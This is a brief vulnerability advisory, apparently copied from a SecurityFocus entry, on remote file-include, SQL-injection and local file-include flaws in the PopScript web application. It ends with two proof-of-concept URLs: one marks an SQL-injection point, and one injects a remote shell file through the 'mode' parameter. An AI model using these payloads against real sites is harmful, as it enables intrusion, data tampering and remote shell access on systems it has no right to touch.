8 lines
No EOL
667 B
Text
Executable file
8 lines
No EOL
667 B
Text
Executable file
source: http://www.securityfocus.com/bid/48113/info
|
|
|
|
PopScript is prone to a remote file-include vulnerability, an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
|
|
|
|
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control.
|
|
|
|
http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
|
|
http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON |